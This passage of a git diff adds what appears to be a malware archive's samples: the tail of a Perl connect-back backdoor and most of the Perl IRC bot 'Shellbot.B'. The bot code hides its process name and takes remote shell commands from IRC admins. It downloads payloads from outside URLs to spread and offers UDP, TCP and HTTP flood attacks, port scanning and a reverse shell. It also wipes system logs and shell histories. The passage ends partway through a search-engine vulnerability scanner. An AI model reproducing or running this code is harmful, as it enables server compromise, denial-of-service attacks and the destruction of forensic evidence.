+#connect to [127.0.0.1] from localhost [127.0.0.1] 32769
+#--== ConnectBack Backdoor vs 1.0 bY MasterKid of WwW.CoM Hackers SABOTAGE ==--
+#
+#--==Systeminfo==--
+#Linux SlackwareLinux 2.6.7 #1 SMP Thu Dec 23 00:05:39 IRT 2004 i686 unknown unknown GNU/Linux
+#
+#--==Userinfo==--
+#uid=1001(lord) gid=100(users) groups=100(users)
+#
+#--==Directory==--
+#/root
+#
+#--==Shell==--
+#
+$system	= '/bin/sh';
+$ARGC=@ARGV; 
+print "--== ConnectBack Backdoor Shell vs 1.0 bY MasterKid of WwW.CoM Hackers SABOTAGE ==-- \n\n"; 
+if ($ARGC!=2) { 
+   print "Usage: $0 [Host] [Port] \n\n"; 
+   die "Ex: $0 127.0.0.1 2121 \n"; 
+} 
+use Socket; 
+use FileHandle; 
+socket(SOCKET, PF_INET, SOCK_STREAM, getprotobyname('tcp')) or die print "[-] Unable to Resolve Host\n"; 
+connect(SOCKET, sockaddr_in($ARGV[1], inet_aton($ARGV[0]))) or die print "[-] Unable to Connect Host\n"; 
+print "[*] Resolving HostName\n";
+print "[*] Connecting... $ARGV[0] \n"; 
+print "[*] Spawning Shell \n";
+print "[*] Connected to remote host \n";
+SOCKET->autoflush(); 
+open(STDIN, ">&SOCKET"); 
+open(STDOUT,">&SOCKET"); 
+open(STDERR,">&SOCKET"); 
+print "--== ConnectBack Backdoor vs 1.0 bY MasterKid of WwW.CoM Hackers SABOTAGE ==--  \n\n"; 
+system("unset HISTFILE; unset SAVEHIST ;echo --==Systeminfo==-- ; uname -a;echo;
+echo --==Userinfo==-- ; id;echo;echo --==Directory==-- ; pwd;echo; echo --==Shell==-- "); 
+system($system);
+#EOF
\ No newline at end of file
diff --git a/Perl/Backdoor.Perl.Shellbot.B.txt b/Perl/Backdoor.Perl.Shellbot.B.txt
new file mode 100644
index 00000000..9aa85a73
--- /dev/null
+++ b/Perl/Backdoor.Perl.Shellbot.B.txt
@@ -0,0 +1,2578 @@
+#!/usr/bin/perl
+#
+########################################################
+# Ketika Rasa Tak Dapat Di Ungkap Dengan Kata
+#	Anak
+#       _____
+#      ( ___ )  _____  __  ___  ____  _   _
+#      | |  \ \(  _  )(  \/   )( _  )( ) ( )
+# _\\\\|_|_ _|_)_(_)_||_\__/|_||_|)_||_|_|_|_\ AnakDompu
+#  ////| |   | ) | | || |\/ | || ___)| | | | /  crew
+#      | |__/ /| (_) || |   | || |   | |_| |
+#      (_____) (_____)(_)   (_)(_)   (_____)
+#
+#              AnakDompu [on] Dalnet й 2008
+#
+#
+########################################################
+
+
+use IO::Socket::INET;
+use HTTP::Request;
+use LWP::UserAgent;
+##################################################
+# Ketika Rasa Tak Dapat Di Ungkap Dengan KataЩ	 #
+# 	  www.AnakDompu.by.ru		 	 #
+#	     Created By Shinchi			 #
+#		 #AnakDompu			 #
+#		irc.dal.net			 #
+##################################################
+my @ps = ("/usr/local/apache/bin/httpd -DSSL","/sbin/syslogd","[eth0]","/sbin/klogd -c 1 -x -x","/usr/sbin/acpid","/usr/sbin/cron","[bash]");
+my $processo = $ps[rand scalar @ps];
+my $linas_max='10';
+my $sleep='3';
+my $cmd="http://www.voetbalkeurmerk.nl/images/adu.png??";
+my $id="http://www.gasthof-neumeister.com/images/zoom/special.txt???";
+my $spread="http://www.gasthof-neumeister.com/images/zoom/alls.txt???";
+my $perawan="http://www.gasthof-neumeister.com/images/zoom/alls.txt???";
+my $idku="http://www.gasthof-neumeister.com/images/zoom/pbots.txt???";
+my @adms=("Shinchi","FuRkaN");
+my @canais=("#╖");
+##################################################
+# Ketika Rasa Tak Dapat Di Ungkap Dengan KataЩ	 #
+# 	  www.AnakDompu.by.ru		 	 #
+#	     Created By Shinchi			 #
+#		 #AnakDompu			 #
+#		irc.dal.net			 #
+##################################################
+my @nickname = ("AkeZuKa",
+    "AbankSayang",
+    "Sampula",
+    "FuRkaN",
+    "AnakDompu",
+    "SaMaDa",
+    "SaMPeLa",
+    "ShuZuKa",
+    "TalamPa",
+    "Tambora",
+    "Henca",
+    "Hencarasa",
+    "HencaSpy",
+    "SamPuLa");
+my @rname = ("Ketika Rasa Tak Dapat Di UngkaP",
+    "PowereD By AnakDompu",
+    "SeRinG PuTus Cinta",
+    "Aku Mudah Jatuh Cinta",
+    "ModeL Bug1L AnakDompu",
+    "Jpop And JrocK Lyric",
+    "Ketika Rasa Tak Dapat Diungkap Bro",
+    "Percuma Kita Bersama DinDa",
+    "Shinchi Memang cakep",
+    "Suka Nonton Movie hentai la",
+    "Lihat Cewek2 Pake tanktop",
+    "Owned By AnakDompu");
+my $nick = $nickname[rand scalar @nickname];
+my $ircname = $nickname[rand scalar @nickname];
+my $realname = $rname[rand scalar @rname];
+$servidor='irc.indoirc.net' unless $servidor;
+my $porta='6667';
+
+$SIG{'INT'} = 'IGNORE';
+$SIG{'HUP'} = 'IGNORE';
+$SIG{'TERM'} = 'IGNORE';
+$SIG{'CHLD'} = 'IGNORE';
+$SIG{'PS'} = 'IGNORE';
+use IO::Socket;
+use Socket;
+use IO::Select;
+chdir("/");
+##################################################
+# Ketika Rasa Tak Dapat Di Ungkap Dengan KataЩ	 #
+# 	  www.AnakDompu.by.ru		 	 #
+#	     Created By Shinchi			 #
+#		 #AnakDompu			 #
+#		irc.dal.net			 #
+##################################################
+
+#Connect
+$servidor="$ARGV[0]" if $ARGV[0];
+$0="$processo"."\0"x16;;
+my $pid=fork;
+exit if $pid;
+die "Masalah fork: $!" unless defined($pid);
+
+our %irc_servers;
+our %DCC;
+my $dcc_sel = new IO::Select->new();
+$sel_cliente = IO::Select->new();
+sub sendraw {
+  if ($#_ == '1') {
+    my $socket = $_[0];
+    print $socket "$_[1]\n";
+    } else {
+    print $IRC_cur_socket "$_[0]\n";
+  }
+}
+
+sub conectar {
+  my $meunick = $_[0];
+  my $servidor_con = $_[1];
+  my $porta_con = $_[2];
+  my $IRC_socket = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$servidor_con",
+  PeerPort=>$porta_con) or return(1);
+  if (defined($IRC_socket)) {
+    $IRC_cur_socket = $IRC_socket;
+    $IRC_socket->autoflush(1);
+    $sel_cliente->add($IRC_socket);
+    $irc_servers{$IRC_cur_socket}{'host'} = "$servidor_con";
+    $irc_servers{$IRC_cur_socket}{'porta'} = "$porta_con";
+    $irc_servers{$IRC_cur_socket}{'nick'} = $meunick;
+    $irc_servers{$IRC_cur_socket}{'meuip'} = $IRC_socket->sockhost;
+    nick("$meunick");
+    sendraw("USER $ircname ".$IRC_socket->sockhost." $servidor_con :$realname");
+    sleep 1;
+  }
+}
+
+my $line_temp;
+while( 1 ) {
+  while (!(keys(%irc_servers))) { conectar("$nick", "$servidor", "$porta"); }
+  delete($irc_servers{''}) if (defined($irc_servers{''}));
+  my @ready = $sel_cliente->can_read(0);
+  next unless(@ready);
+  foreach $fh (@ready) {
+    $IRC_cur_socket = $fh;
+    $meunick = $irc_servers{$IRC_cur_socket}{'nick'};
+    $nread = sysread($fh, $msg, 4096);
+    if ($nread == 0) {
+      $sel_cliente->remove($fh);
+      $fh->close;
+      delete($irc_servers{$fh});
+    }
+    @lines = split (/\n/, $msg);
+    for(my $c=0; $c<= $#lines; $c++) {
+
+      $line = $lines[$c];
+      $line=$line_temp.$line if ($line_temp);
+      $line_temp='';
+      $line =~ s/\r$//;
+      unless ($c == $#lines) {
+        parse("$line");
+        } else {
+        if ($#lines == 0) {
+          parse("$line");
+          } elsif ($lines[$c] =~ /\r$/) {
+          parse("$line");
+          } elsif ($line =~ /^(\S+) NOTICE AUTH :\*\*\*/) {
+          parse("$line");
+          	   } else {
+          	               $line_temp = $line;
+        }
+      }
+    }
+  }
+}
+
+sub parse {
+  my $servarg = shift;
+  if ($servarg =~ /^PING \:(.*)/) {
+    sendraw("PONG :$1");
+    } elsif ($servarg =~ /^\:(.+?)\!(.+?)\@(.+?) PRIVMSG (.+?) \:(.+)/) {
+    my $pn=$1; my $hostmask= $3; my $onde = $4; my $args = $5;
+    if ($args =~ /^\001VERSION\001$/) {
+      	 notice("$pn", "\001VERSION mIRC v6.17 Khaled Mardam-Bey\001");
+    }
+    if (grep {$_ =~ /^\Q$pn\E$/i } @adms ) {
+    if ($onde eq "$meunick"){
+    shell("$pn", "$args");
+  }
+
+#End of Connect
+
+##################################################
+# Ketika Rasa Tak Dapat Di Ungkap Dengan KataЩ	 #
+# 	  www.AnakDompu.by.ru		 	 #
+#	     Created By Shinchi			 #
+#		 #AnakDompu			 #
+#		irc.dal.net			 #
+##################################################
+#      PREFIX        #
+######################
+
+  if ($args =~ /^(\Q$meunick\E|\!bro)\s+(.*)/ ) {
+    my $natrix = $1;
+    my $arg = $2;
+    if ($arg =~ /^\!(.*)/) {
+      ircase("$pn","$onde","$1") unless ($natrix eq "!bro" and $arg =~ /^\!nick/);
+      } elsif ($arg =~ /^\@(.*)/) {
+      $ondep = $onde;
+      $ondep = $pn if $onde eq $meunick;
+      bfunc("$ondep","$1");
+      } else {
+      shell("$onde", "$arg");
+    }
+  }
+}
+}
+######################
+#   End of PREFIX    #
+######################
+
+elsif ($servarg =~ /^\:(.+?)\!(.+?)\@(.+?)\s+NICK\s+\:(\S+)/i) {
+if (lc($1) eq lc($meunick)) {
+  $meunick=$4;
+  $irc_servers{$IRC_cur_socket}{'nick'} = $meunick;
+}
+} elsif ($servarg =~ m/^\:(.+?)\s+433/i) {
+nick("$meunick".int rand(999999));
+} elsif ($servarg =~ m/^\:(.+?)\s+001\s+(\S+)\s/i) {
+$meunick = $2;
+$irc_servers{$IRC_cur_socket}{'nick'} = $meunick;
+$irc_servers{$IRC_cur_socket}{'nome'} = "$1";
+foreach my $canal (@canais) {
+  sendraw("JOIN $canal ddosit");
+}
+}
+}
+
+sub bfunc {
+my $printl = $_[0];
+my $funcarg = $_[1];
+if (my $pid = fork) {
+waitpid($pid, 0);
+} else {
+if (fork) {
+  exit;
+} else {
+
+######################
+#       Help         #
+######################
+
+if ($funcarg =~ /^help/) {
+	sendraw($IRC_cur_socket, "PRIVMSG $printl :11,10[1BaNtUaN]8,1 Select the function you want help for");
+	sendraw($IRC_cur_socket, "PRIVMSG $printl :11,10[1BaNtUaN]8,1 !bro 13@4ddos");
+	sendraw($IRC_cur_socket, "PRIVMSG $printl :11,10[1BaNtUaN]8,1 !bro 13@4scan");
+	sendraw($IRC_cur_socket, "PRIVMSG $printl :11,10[1BaNtUaN]8,1 !bro 13@4backconnect");
+	sendraw($IRC_cur_socket, "PRIVMSG $printl :11,10[1BaNtUaN]8,1 !bro 13@4shell");
+	sendraw($IRC_cur_socket, "PRIVMSG $printl :11,10[1BaNtUaN]8,1 !bro 13@4portscanner");
+	sendraw($IRC_cur_socket, "PRIVMSG $printl :11,10[1BaNtUaN]8,1 Or if you want too know all the commands type:");
+	sendraw($IRC_cur_socket, "PRIVMSG $printl :11,10[1BaNtUaN]8,1 !bro 13@4commands");
+
+}
+
+if ($funcarg =~ /^ddos/) {
+	sendraw($IRC_cur_socket, "PRIVMSG $printl :11,10[1BaNtUaN]8,1 There are 3 DDossers in this bot");
+	sendraw($IRC_cur_socket, "PRIVMSG $printl :11,10[1BaNtUaN]8,1 UDPFlood, HTTPFlood and TCPFlood");
+	sendraw($IRC_cur_socket, "PRIVMSG $printl :11,10[1BaNtUaN]8,1 !bro 13@4udpflood <ip> <packet size> <time>");
+	sendraw($IRC_cur_socket, "PRIVMSG $printl :11,10[1BaNtUaN]8,1 !bro 13@4tcpflood <ip> <port> <packet size> <time>");
+	sendraw($IRC_cur_socket, "PRIVMSG $printl :11,10[1BaNtUaN]8,1 !bro 13@4httpflood <site> <time>");
+
+}
+
+if ($funcarg =~ /^scanscan/) {
+	sendraw($IRC_cur_socket, "PRIVMSG $printl :11,10[1BaNtUaN]8,1 This bot also contains a scan Scanner.");
+	sendraw($IRC_cur_socket, "PRIVMSG $printl :11,10[1BaNtUaN]8,1 Commands :");
+	sendraw($IRC_cur_socket, "PRIVMSG $printl :11,10[1BaNtUaN]8,1 !bro 13@4scan <vuln> <dork>");
+	sendraw($IRC_cur_socket, "PRIVMSG $printl :11,10[1BaNtUaN]8,1 You can find strings here : http://www.xshqiptaretx.org/strings.txt ");
+
+}
+
+if ($funcarg =~ /^backconnect/) {
+	sendraw($IRC_cur_socket, "PRIVMSG $printl :11,10[1BaNtUaN]8,1 You use backconnect like this :");
+	sendraw($IRC_cur_socket, "PRIVMSG $printl :11,10[1BaNtUaN]8,1 !bro 13@4back <ip><port>");
+}
+
+if ($funcarg =~ /^shell/) {
+	sendraw($IRC_cur_socket, "PRIVMSG $printl :11,10[1BaNtUaN]8,1 This bot has a integrated shell");
+	sendraw($IRC_cur_socket, "PRIVMSG $printl :11,10[1BaNtUaN]8,1 You can use it in private but also public in the channel");
+	sendraw($IRC_cur_socket, "PRIVMSG $printl :11,10[1BaNtUaN]8,1 In public channel just use : 7!bro cd tmp12 for example");
+	sendraw($IRC_cur_socket, "PRIVMSG $printl :11,10[1BaNtUaN]8,1 For help with the linux commands type :!bro 13@4linuxhelp");
+}
+
+if ($funcarg =~ /^portscanner/) {
+	sendraw($IRC_cur_socket, "PRIVMSG $printl :11,10[1BaNtUaN]8,1 There is a normal portscan and a Nmap:");
+	sendraw($IRC_cur_socket, "PRIVMSG $printl :11,10[1BaNtUaN]8,1 !bro 13@4portscan <ip>");
+	sendraw($IRC_cur_socket, "PRIVMSG $printl :11,10[1BaNtUaN]8,1 !bro 13@4nmap <ip> <beginport> <endport>");
+}
+
+if ($funcarg =~ /^commands/) {
+	sendraw($IRC_cur_socket, "PRIVMSG $printl :11,10[1BaNtUaN]8,1 You can use the following commands :");
+	sendraw($IRC_cur_socket, "PRIVMSG $printl :11,10[1BaNtUaN]8,1 !bro 13@4portscan <ip>");
+	sendraw($IRC_cur_socket, "PRIVMSG $printl :11,10[1BaNtUaN]8,1 !bro 13@4nmap <ip> <beginport> <endport>");
+	sendraw($IRC_cur_socket, "PRIVMSG $printl :11,10[1BaNtUaN]8,1 !bro 13@4back <ip><port>");
+	sendraw($IRC_cur_socket, "PRIVMSG $printl :11,10[1BaNtUaN]8,1 !bro cd tmp 12 for example");
+	sendraw($IRC_cur_socket, "PRIVMSG $printl :11,10[1BaNtUaN]8,1 !bro 13@4udpflood <ip> <packet size> <time>");
+	sendraw($IRC_cur_socket, "PRIVMSG $printl :11,10[1BaNtUaN]8,1 !bro 13@4tcpflood <ip> <port> <packet size> <time>");
+	sendraw($IRC_cur_socket, "PRIVMSG $printl :11,10[1BaNtUaN]8,1 !bro 13@4httpflood <site> <time>");
+	sendraw($IRC_cur_socket, "PRIVMSG $printl :11,10[1BaNtUaN]8,1 !bro 13@4linuxhelp");
+	sendraw($IRC_cur_socket, "PRIVMSG $printl :11,10[1BaNtUaN]8,1 !bro 13@4spread <scan>");
+	sendraw($IRC_cur_socket, "PRIVMSG $printl :11,10[1BaNtUaN]8,1 !bro 13@4scan <vuln> <dork>");
+	sendraw($IRC_cur_socket, "PRIVMSG $printl :11,10[1BaNtUaN]8,1 !bro 13@4system");
+	sendraw($IRC_cur_socket, "PRIVMSG $printl :11,10[1BaNtUaN]8,1 !bro 13@4logcleaner");
+	sendraw($IRC_cur_socket, "PRIVMSG $printl :11,10[1BaNtUaN]8,1 !bro 13@4sendmail <subject> <sender> <recipient> <message>");
+	sendraw($IRC_cur_socket, "PRIVMSG $printl :11,10[1BaNtUaN]8,1 !bro 13@4milw0rm");
+	sendraw($IRC_cur_socket, "PRIVMSG $printl :11,10[1BaNtUaN]8,1 !bro 13@4join #channel");
+	sendraw($IRC_cur_socket, "PRIVMSG $printl :11,10[1BaNtUaN]8,1 !bro 13@4part #channel");
+}
+
+if ($funcarg =~ /^linuxhelp/) {
+	sendraw($IRC_cur_socket, "PRIVMSG $printl :11,10[1BantuanLinuX]8,1 - Dir where you are : pwd");
+	sendraw($IRC_cur_socket, "PRIVMSG $printl :11,10[1BantuanLinuX]8,1 - Start a Perl file : perl file.pl");
+	sendraw($IRC_cur_socket, "PRIVMSG $printl :11,10[1BantuanLinuX]8,1 - Go back from dir : cd ..");
+	sendraw($IRC_cur_socket, "PRIVMSG $printl :11,10[1BantuanLinuX]8,1 - Force to Remove a file/dir : rm -rf file/dir;ls -la");
+	sendraw($IRC_cur_socket, "PRIVMSG $printl :11,10[1BantuanLinuX]8,1 - Show all files/dir with permissions : ls -lia");
+	sendraw($IRC_cur_socket, "PRIVMSG $printl :11,10[1BantuanLinuX]8,1 - Find config.inc.php files : find / -type f -name config.inc.php");
+	sendraw($IRC_cur_socket, "PRIVMSG $printl :11,10[1BantuanLinuX]8,1 - Find all writable folders and files : find / -perm -2 -ls");
+	sendraw($IRC_cur_socket, "PRIVMSG $printl :11,10[1BantuanLinuX]8,1 - Find all .htpasswd files : find / -type f -name .htpasswd");
+	sendraw($IRC_cur_socket, "PRIVMSG $printl :11,10[1BantuanLinuX]8,1 - Find all service.pwd files : find / -type f -name service.pwd");
+}
+
+######################
+#   End of  Help     #
+######################
+if ($funcarg =~ /^spread\s+(.*)/) {
+$vuln = $1;
+sendraw($IRC_cur_socket, "PRIVMSG $printl :11,10[1Spread Mode] 13,6[1Shinchi]11,10[1Memang]13,6[1Cakep] :4 $vuln");
+my $shellurl="http://".$vuln.$spread."?";
+my $reqz=HTTP::Request->new(GET=>$shellurl);
+my $ua=LWP::UserAgent->new();
+my $response=$ua->request($reqz);
+sendraw($IRC_cur_socket, "PRIVMSG $printl :11,10[1Spread Mode] 11,10[1AnakDompu] :12 $vuln");
+}
+
+############################################
+#   Moded By Shinchi AnakDompu @Dalnet     #
+############################################
+
+if ($funcarg =~ /^LoadBotPhp\s+(.*)/) {
+$vuln = $1;
+sendraw($IRC_cur_socket, "PRIVMSG $printl :11,10[1Menjalankan BotPhp] 13,6[1Shinchi]11,10[1Memang]13,6[1Cakep] :4 $vuln");
+my $kalampabot="http://".$vuln.$idku."?";
+my $reqz=HTTP::Request->new(GET=>$kalampabot);
+my $ua=LWP::UserAgent->new();
+my $response=$ua->request($reqz);
+sendraw($IRC_cur_socket, "PRIVMSG $printl :11,10[1Botphp] 11,10[1DiJalanKan] :12 $vuln");
+}
+######################
+#     Commands       #
+######################
+
+if ($funcarg =~ /^system/) {
+$uname=`uname -a`;$uptime=`uptime`;$ownd=`pwd`;$distro=`cat /etc/issue`;$id=`id`;$un=`uname -sro`;
+	sendraw($IRC_cur_socket, "PRIVMSG $printl :11,10[1System]8,18,113,6[1Info] Info BOT : Server : 14Cannot View :14 1337");
+	sendraw($IRC_cur_socket, "PRIVMSG $printl :11,10[1System]8,18,113,6[1Info] Uname -a     : 7 $uname");
+	sendraw($IRC_cur_socket, "PRIVMSG $printl :11,10[1System]8,18,113,6[1Info] Uptime       : 7 $uptime");
+	sendraw($IRC_cur_socket, "PRIVMSG $printl :11,10[1System]8,18,113,6[1Info] Own Prosses  : 7 $processo");
+	sendraw($IRC_cur_socket, "PRIVMSG $printl :11,10[1System]8,18,113,6[1Info] ID           : 7 $id");
+	sendraw($IRC_cur_socket, "PRIVMSG $printl :11,10[1System]8,18,113,6[1Info] Own Dir      : 7 $ownd");
+	sendraw($IRC_cur_socket, "PRIVMSG $printl :11,10[1System]8,18,113,6[1Info] OS           : 7 $distro");
+	sendraw($IRC_cur_socket, "PRIVMSG $printl :11,10[1System]8,18,113,6[1Info] Owner        : 7 Shinchi Memang Cakep");
+	sendraw($IRC_cur_socket, "PRIVMSG $printl :11,10[1System]8,18,113,6[1Info] Channel      : 7 #AnakDompu");
+}
+
+if ($funcarg =~ /^milw0rm/) {
+	my @ltt=();
+	my @bug=();
+	my $x;
+	my $page="";
+	my $socke = IO::Socket::INET->new(PeerAddr=>"milw0rm.com",PeerPort=>"80",Proto=>"tcp") or return;
+	print $socke "GET http://milw0rm.com/rss.php HTTP/1.0\r\nHost: milw0rm.com\r\nAccept: */*\r\nUser-Agent: Mozilla/5.0\r\n\r\n";
+	my @r = <$socke>;
+	$page="@r";
+	close($socke);
+	while ($page =~  m/<title>(.*)</g){
+	$x = $1;
+	if ($x =~ /\&lt\;/) {
+	$x =~ s/\&lt\;/</g;
+	}
+	if ($x !~ /milw0rm/) {
+	push (@bug,$x);
+	}}
+	while ($page =~  m/<link.*expl.*([0-9]...)</g) {
+	if ($1 !~ m/milw0rm.com|exploits|en/){
+	push (@ltt,"http://www.milw0rm.com/exploits/$1 ");
+	}}
+		sendraw($IRC_cur_socket, "PRIVMSG $printl :11,10[1Milw0rm Bugs]  Latest exploits :");
+	foreach $x (0..(@ltt - 1)) {
+		sendraw($IRC_cur_socket, "PRIVMSG $printl :11,10[1Milw0rm Bugs]14 $bug[$x] -3 $ltt[$x]");
+	sleep 1;
+}}
+##################################################
+# Ketika Rasa Tak Dapat Di Ungkap Dengan KataЩ	 #
+# 	  www.AnakDompu.by.ru		 	 #
+#	     Created By Shinchi			 #
+#		 #AnakDompu			 #
+#		irc.dal.net			 #
+##################################################
+######################
+#      Portscan      #
+######################
+
+if ($funcarg =~ /^portscan (.*)/) {
+  my $hostip="$1";
+  my
+  @portas=("15","19","98","20","21","22","23","25","37","39","42","43","49","53","63","69","79","80","101","106","107","109","110","111","113","115","117","119","135","137","139","143","174","194","389","389","427","443","444","445","464","488","512","513","514","520","540","546","548","565","609","631","636","694","749","750","767","774","783","808","902","988","993","994","995","1005","1025","1033","1066","1079","1080","1109","1433","1434","1512","2049","2105","2432","2583","3128","3306","4321","5000","5222","5223","5269","5555","6660","6661","6662","6663","6665","6666","6667","6668","6669","7000","7001","7741","8000","8018","8080","8200","10000","19150","27374","31310","33133","33733","55555");
+  my (@aberta, %porta_banner);
+  sendraw($IRC_cur_socket, "PRIVMSG $printl :11,10[1PortScan] Scanning for open ports on  12".$1." started .");
+  foreach my $porta (@portas)  {
+    my $scansock = IO::Socket::INET->new(PeerAddr => $hostip, PeerPort => $porta, Proto =>
+    'tcp', Timeout => 4);
+    if ($scansock) {
+      push (@aberta, $porta);
+      $scansock->close;
+    }
+  }
+
+  if (@aberta) {
+    sendraw($IRC_cur_socket, "PRIVMSG $printl :11,10[1PortScan] Port Yang Terbuka:5 @aberta");
+    } else {
+    sendraw($IRC_cur_socket, "PRIVMSG $printl :11,10[1PortScan] Tidak Ada Ports Yang Terbuka.");
+  }
+}
+
+######################
+#  End of  Portscan  #
+######################
+##################################################
+# Ketika Rasa Tak Dapat Di Ungkap Dengan KataЩ	 #
+# 	  www.AnakDompu.by.ru		 	 #
+#	     Created By Shinchi			 #
+#		 #AnakDompu			 #
+#		irc.dal.net			 #
+##################################################
+######################
+#        Nmap        #
+######################
+   if ($funcarg =~ /^nmap\s+(.*)\s+(\d+)\s+(\d+)/){
+         my $hostip="$1";
+         my $portstart = "$2";
+         my $portend = "$3";
+         my (@abertas, %porta_banner);
+       sendraw($IRC_cur_socket, "PRIVMSG $printl :11,10[1Nmap] :12 $1 11,10[1PoRt] 12 $2-$3");
+       foreach my $porta ($portstart..$portend){
+               my $scansock = IO::Socket::INET->new(PeerAddr => $hostip, PeerPort => $porta, Proto => 'tcp', Timeout => $portime);
+    if ($scansock) {
+                 push (@abertas, $porta);
+                 $scansock->close;
+                 if ($xstats){
+        sendraw($IRC_cur_socket, "PRIVMSG $printl :11,10[1Nmap] Founded 12 $porta"."/Open");
+                 }
+               }
+             }
+             if (@abertas) {
+        sendraw($IRC_cur_socket, "PRIVMSG $printl :11,10[1Nmap] Complete ");
+             } else {
+        sendraw($IRC_cur_socket, "PRIVMSG $printl :11,10[1Nmap] No open ports have been founded 13");
+             }
+			 }
+######################
+#    End of Nmap     #
+######################
+##################################################
+# Ketika Rasa Tak Dapat Di Ungkap Dengan KataЩ	 #
+# 	  www.AnakDompu.by.ru		 	 #
+#	     Created By Shinchi			 #
+#		 #AnakDompu			 #
+#		irc.dal.net			 #
+##################################################
+#######################
+# Menghapus Log File  #
+#######################
+if ($funcarg =~ /^hapuslog/) {
+sendraw($IRC_cur_socket, "PRIVMSG $printl :8,113,6[1MengHapusLogFile] Poses Ini Sangat Lama Tunggu Beberapa Saat");
+    system 'rm -rf /var/log/lastlog';
+    system 'rm -rf /var/log/wtmp';
+	system 'rm -rf /etc/wtmp';
+	system 'rm -rf /var/run/utmp';
+	system 'rm -rf /etc/utmp';
+	system 'rm -rf /var/log';
+	system 'rm -rf /var/logs';
+	system 'rm -rf /var/adm';
+	system 'rm -rf /var/apache/log';
+	system 'rm -rf /var/apache/logs';
+	system 'rm -rf /usr/local/apache/log';
+	system 'rm -rf /usr/local/apache/logs';
+	system 'rm -rf /root/.bash_history';
+	system 'rm -rf /root/.ksh_history';
+sendraw($IRC_cur_socket, "PRIVMSG $printl :8,113,6[1MengHapusLogFile] Semua default log Dan File bash_history Akan Di Hapus");
+		sleep 1;
+sendraw($IRC_cur_socket, "PRIVMSG $printl :8,113,6[1MengHapusLogFile] Sekarang Menghapus Log File Di System");
+	system 'find / -name *.bash_history -exec rm -rf {} \;';
+	system 'find / -name *.bash_logout -exec rm -rf {} \;';
+	system 'find / -name "log*" -exec rm -rf {} \;';
+	system 'find / -name *.log -exec rm -rf {} \;';
+		sleep 1;
+sendraw($IRC_cur_socket, "PRIVMSG $printl :8,113,6[1MengHapusLogFile] Selesai Semua Logs TeLaH Di BeRsIhKaN");
+      }
+#############################
+# Akhir Menghapus Log File  #
+#############################
+##################################################
+# Ketika Rasa Tak Dapat Di Ungkap Dengan KataЩ	 #
+# 	  www.AnakDompu.by.ru		 	 #
+#	     Created By Shinchi			 #
+#		 #AnakDompu			 #
+#		irc.dal.net			 #
+##################################################
+######################
+#       MAILER       #
+######################
+# For mailing use :
+# !bro @sendmail <subject> <sender> <recipient> <message>
+#
+######################
+if ($funcarg =~ /^sendmail\s+(.*)\s+(.*)\s+(.*)\s+(.*)/) {
+sendraw($IRC_cur_socket, "PRIVMSG $printl :11,10[1Mailer]8,1 Try Sending Mail to :10 $3");
+$subject = $1;
+$sender = $2;
+$recipient = $3;
+@corpo = $4;
+$mailtype = "content-type: text/html";
+$sendmail = '/usr/sbin/sendmail';
+open (SENDMAIL, "| $sendmail -t");
+print SENDMAIL "$mailtype\n";
+print SENDMAIL "Subject: $subject\n";
+print SENDMAIL "From: $sender\n";
+print SENDMAIL "To: $recipient\n\n";
+print SENDMAIL "@corpo\n\n";
+close (SENDMAIL);
+sendraw($IRC_cur_socket, "PRIVMSG $printl :11,10[1Mailer]8,1 Successfully Sended to :10 $recipient");
+}
+######################
+#   End of MAILER    #
+######################
+######################
+#  Join And Part     #
+######################
+           if ($funcarg =~ /^join (.*)/) {
+              sendraw($IRC_cur_socket, "JOIN ".$1);
+           }
+           if ($funcarg =~ /^part (.*)/) {
+              sendraw($IRC_cur_socket, "PART ".$1);
+           }
+
+######################
+#End of Join And Part#
+######################
+##################################################
+# Ketika Rasa Tak Dapat Di Ungkap Dengan KataЩ	 #
+# 	  www.AnakDompu.by.ru		 	 #
+#	     Created By Shinchi			 #
+#		 #AnakDompu			 #
+#		irc.dal.net			 #
+##################################################
+######################
+#     TCPFlood       #
+######################
+
+if ($funcarg =~ /^tcpflood\s+(.*)\s+(\d+)\s+(\d+)/) {
+  sendraw($IRC_cur_socket, "PRIVMSG $printl :11,10[1TCP DDoS]8,1 13,6[1HaJaR] 10 ".$1.":".$2." Untuk 10 ".$3." detik.");
+  my $itime = time;
+  my ($cur_time);
+  $cur_time = time - $itime;
+  while ($3>$cur_time){
+  $cur_time = time - $itime;
+  &tcpflooder("$1","$2","$3");
+}
+sendraw($IRC_cur_socket,"PRIVMSG $printl :0,113,6[1TCP DDoS] HaJar SeLeSai 10 ".$1.":".$2.".");
+}
+######################
+#  End of TCPFlood   #
+######################
+##################################################
+# Ketika Rasa Tak Dapat Di Ungkap Dengan KataЩ	 #
+# 	  www.AnakDompu.by.ru		 	 #
+#	     Created By Shinchi			 #
+#		 #AnakDompu			 #
+#		irc.dal.net			 #
+##################################################
+######################
+#   Back Connect     #
+######################
+if ($funcarg =~ /^back\s+(.*)\s+(\d+)/) {
+my $host = "$1";
+my $porta = "$2";
+my $proto = getprotobyname('tcp');
+my $iaddr = inet_aton($host);
+my $paddr = sockaddr_in($porta, $iaddr);
+my $shell = "/bin/sh -i";
+if ($^O eq "MSWin32") {
+  $shell = "cmd.exe";
+}
+socket(SOCKET, PF_INET, SOCK_STREAM, $proto) or die "socket: $!";
+connect(SOCKET, $paddr) or die "connect: $!";
+open(STDIN, ">&SOCKET");
+open(STDOUT, ">&SOCKET");
+open(STDERR, ">&SOCKET");
+system("$shell");
+close(STDIN);
+close(STDOUT);
+close(STDERR);
+if ($estatisticas)
+{
+  sendraw($IRC_cur_socket, "PRIVMSG $printl :11,10[1BackConnect] Konek Ke 10 $host:$porta");
+}
+}
+######################
+#End of  Back Connect#
+##################################################
+# Ketika Rasa Tak Dapat Di Ungkap Dengan KataЩ	 #
+# 	  www.AnakDompu.by.ru		 	 #
+#	     Created By Shinchi			 #
+#		 #AnakDompu			 #
+#		irc.dal.net			 #
+##################################################
+#   EExPreSi SCANNER #
+######################
+######################################################################
+#################### GOOGLE
+######################################################################
+if ($funcarg =~ /^scan\s+(.*?)\s+(.*)/){
+if (my $pid = fork) {
+waitpid($pid, 0);
+} else {
+if (fork) {
+exit;
+} else {
+my $bug=$1;
+my $dork=$2;
+my $contatore=0;
+my %hosts;
+### Start Message
+  sendraw($IRC_cur_socket, "PRIVMSG $printl :11,10[1Memulai]8,18,113,6[1Scan]11,10[1Untuk]8,113,6[1Bug]13,1 $bug 9,1DaN10,1 $dork");
+### End of Start Message
+# Starting The Search Engine
+	my @google=&googlet($dork);
+#
+push(my @tot, @google);
+#
+my @puliti=&unici(@tot);
